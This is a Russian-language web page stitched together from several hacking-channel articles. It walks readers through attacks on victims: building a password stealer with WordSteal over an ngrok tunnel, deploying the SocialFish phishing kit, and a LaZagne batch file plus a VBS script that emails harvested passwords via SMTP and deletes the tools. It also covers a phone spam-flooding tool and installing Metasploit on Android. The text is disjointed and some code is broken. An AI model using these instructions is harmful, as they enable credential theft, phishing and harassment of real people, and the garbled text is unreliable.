Стиллер своими руками термекс

Добавил пользователь Алексей Ф.
Обновлено: 05.09.2024

Стиллер (Stealer) — вредоносная программа, созданная для кражи паролей и
куков из браузеров жертвы.

Установка и эксплуатация
Обновляем пакеты и устанавливаем git с помощью команд:
apt-get update && apt-get upgrade

apt-get install git

Переходим в репозиторий Ngrok, делаем скрипт исполняемым и запускаем его:
cd termux-ngrok

chmod +x termux-ngrok.sh

Дожидаемся окончания процесса установки.

После установки вводим команду:
ngrok tcp 4444

Теперь открываем второй терминал/сессию и устанавливаем python2:
pkg install git python2

Скачиваем любую картинку из интернета и копируем в репозиторий инструмента.
Открываем репозиторий инструмента командой:
cd WordSteal

И создаем вредоносную картинку:
python2 main.py 127.0.0.1

Созданный вредоносный файл отправляем нашей жертве и ждем открытие. После
открытия вредонос украдет все пароли и отправит вам.

LOCKNET
LOCKNET LOCKNET

О, брат, ты снова зашёл на мою статью? Окей, значит ты зашёл именно туда, куда нужно. Сейчас я хочу познакомить с фишинговым инструментом SocialFish. Он позволяет легко создавать фейк-страницы самых популярных веб-сайтов, таких как Instagram, Twitter, Github и т.д.


LOCKNET

Установка

Клонируй это из Github в Termux.


LOCKNET

Перейди в папку SocialFish, установите требования, измените режим файла python и выполните:

cd SocialFish
apt install python3-pip // Если не установлено
pip3 install -r requirements.txt // Если не установлено
chmod 777 SocialFish.py
./SocialFish.py

LOCKNET LOCKNET LOCKNET LOCKNET

Возможно, у вас появится вот такая ошибка.


LOCKNET

Если она у вас появилась, то делаем следующее:


LOCKNET

Соглашаемся и продолжаем:

LOCKNET LOCKNET LOCKNET

После установки мы запускаем SocialFish заново и соглашаемся:


LOCKNET

После того, как вы ответите на вопросы, вы увидите доступные варианты страниц:

Можете использовать любой. Ничего сложно в этом нет.

Если нравится контент - поддержи канал: QIWI - 89118740017


LOCKNET

Инкогнито - не забываем подписываться на наш второй канал!

Предыдущие статьи:

Другие статьи на нашем с вами любимом канале LOCKNET! Подписывайся, делись ссылкой на статью с друзьями!

Расскажу вам, как сделать собственный стиллер и настроить его под себя из подручных средств.

1) LaZagne – прога для восстановления паролей и записи их в файл;

2) Batch-файл для запуска LaZagne и указания директории сохранения отчета и его имени;

3) Скрипт на VBS для отправки письма на почтовый адрес;

4) Конвертер VBS to EXE (по желанию, можно и без него);

5) Конвертер BAT to EXE.


Шаг 1. Создаем Batch файл со следующими строками:
Код:
@echo off

laZagne.exe all > D:\install_error.bin

del /s "%UserProfile%\Downloads\laZagne.exe"

del /s "%UserProfile%\Downloads\SENDER.exe"

del /s "%UserProfile%\Desktop\laZagne.exe"

del /s "%UserProfile%\Desktop\SENDER.exe"

где "D:\install_error.bin" – это директория и имя сохраненного отчета, TIMEOUT необходим для ожидания создания отчета (в среднем занимает этот процесс 1 секунду для 100 паролей).

Шаг 2. Создаем обычный текстовый документ в Notepad++, например. И сохраняем его в формате .vbs с таким содержимым:
Код:
Dim o_Mess, v_Conf

Set o_Mess = CreateObject("CDO.Message")

.To = "получатель@mail.ru" 'куда отправляем

.From 'имя отправителя + Email

.Subject = "Log" 'Тема письма

.AddAttachment "D:\install_error.bin" 'Прикрепить файл

.TextBodyPart.Charset = "windows-1251" 'русская кодировка

.Item(v_Conf & "sendusing") = 2 'без использования каталога Server Exchange

.Item(v_Conf & "smtpserver") = "smtp.mail.ru" 'Адрес SMTP-сервера

.Item(v_Conf & "smtpauthenticate") = 1 'Тип авторизации

.Item(v_Conf & "sendusername") = "отправитель@mail.ru" 'здесь имя пользователя

.Item(v_Conf & "sendpassword") = "пароль отправителя" 'пароль

.Item(v_Conf & "smtpserverport") = 465 'порт (альтернативный - 465)

.Item(v_Conf & "smtpusessl") = True 'использовать ли шифрованое подключение SSL

.Item(v_Conf & "smtpconnectiontimeout") = 60 'Время до завершения повторных попыток подключения

Спам-атаки могут привести к потере данных у жертвы, что является противозаконным действием и карается законом. Данная статья создана исключительно для ознакомления и не призывает к действиям!

Спам телефона на ОС Android

В этой пусть и небольшой, но не менее полезной статейке я расскажу как можно буквально заспамить любой телефон.

На сайте есть статья, где вы можете ознакомится с Kali Linux, а так же скачать книгу для ознакомления и продвинутого изучения командной строки Linux. Все что нам понадобиться это Интернет, смартфон на ОС Android и эмулятор Linux терминала Termux.

Установка Termux и всего необходимого для спама телефона на ОС Android

Заходим в Google Play и скачиваем Termux.
Открываем программу и прописываем код:

Осталось только запустить наш спаммер следующей командой:

python2 spammer.py номер (без +).

Остановка спам-атаки осуществляется выходом из приложения. Также в этом приложении можно создать несколько атак простым свайпом вправо и нажатием кнопки New session , потом
cd Spammer-Grab-1
python2 spammer.py номер (без +)

Для уменьшения задержки:

python2 spammer.py --delay (задержка) (номер) без скобок!

Обновление статьи: ссылка на репозиторий обновлена по причине не работоспособности старой (25.02.2019).

Прокси для работы со spammet-grub приобретаем здесь.

Также на сайте есть пост про ПО для флуда с ОС Windows, которое использует для работы 28 сервисов.


Все мы видели в фильмах о хакерах сцены взлома с помощью мобильных телефонов. Обычно все, что там творится, — выдумка. Однако и эта выдумка медленно, но верно становится реальностью. Из этой статьи ты узнаешь, как приблизиться к кино и превратить свой телефон в настоящий хакерский инструмент.

Что нужно знать и сделать перед установкой

Первое, о чем следует позаботиться, — это права root. Без них некоторые функции установленных нами утилит могут не поддерживаться или работать некорректно. Поэтому настоятельно рекомендую их заполучить. Особенно это касается пользователей с Android 10 и более поздних версий.

Получение root в каждом случае уникально, ведь оно напрямую зависит от конкретной модели устройства и версии Android. Я в этой статье буду использовать свой старенький Samsung Galaxy S6 (SM-G920F) на Android 7.0 Nougat, для рута в котором уже есть специальный инструмент. В остальных случаях придется погуглить и узнать, как получить рут конкретно на твоем устройстве. На форуме 4PDA почти всегда есть нужная инструкция.

Также нам понадобится Termux — простой и удобный терминал, дающий многие возможности среды Linux, который и позволит исполнять наши команды в подходящей среде и не возиться с предварительной настройкой окружения.

Рекомендую также установить утилиту tsu, которая предоставит тебе возможность выполнять команды от рута. Если она не работает должным образом, загляни в GitHub-репозиторий, который настраивает работу рута в Termux. Это нужно, чтобы Termux сразу имел рут-доступ, который может понадобиться для дальнейших операций.

Важный момент: при использовании в качестве рута Magisk (а на большинстве современных устройств альтернатив нет и не предвидится) не забудь в его настройках разрешить Termux рут-доступ, а также добавить в исключения для Magisk Hide, иначе все наши действия будут бесполезны.

Также рекомендую обновить список пакетов, как мы обычно делаем это в десктопе Kali:

Пара слов о Kali NetHunter

Если ты один из тех счастливчиков, чье устройство оказалось в списке поддерживаемых, рекомендую попробовать Kali NetHunter. Это платформа, созданная разработчиками Kali Linux специально для телефонов на Android. В NetHunter сразу доступно много рабочего софта из десктопной версии Kali. Образы можно найти на официальном сайте. Это более мощный набор, чем тот, что ты можешь получить с помощью Termux.

Устанавливаем Metasploit

Полное описание Metasploit — тема для отдельной статьи, поэтому пройдемся по нему вкратце. Metasploit Framework — фреймворк, предназначенный для создания, отладки и, конечно, применения эксплоитов.

Установить Metasploit Framework (MSF) на Android 7 или выше можно в две команды:

На Android 5.x.x–6.x.x MSF устанавливают несколько другим методом:

WARNING

Все эти команды следует выполнять с правами обычного пользователя, если не оговорено иное: при выполнении от рута могут возникать трудноисправимые проблемы.

В частности, при запуске apt от рута мы получим сбитые контексты SELinux, что потом помешает нам устанавливать пакеты.

Установка может затянуться. Не закрывай сессию Termux до конца установки MSF!

WARNING

Не стоит обновлять MSF вручную редактированием $PREFIX/opt/metasploit , так как это может привести к проблемам с зависимостями.

Теперь, чтобы убедиться, что у нас все работает, запустим Metasploit:

Metasploit Framework

Metasploit Framework

Как видишь, все отлично и в твоем распоряжении 2014 эксплоитов. ?

Продолжение доступно только участникам

Читайте также: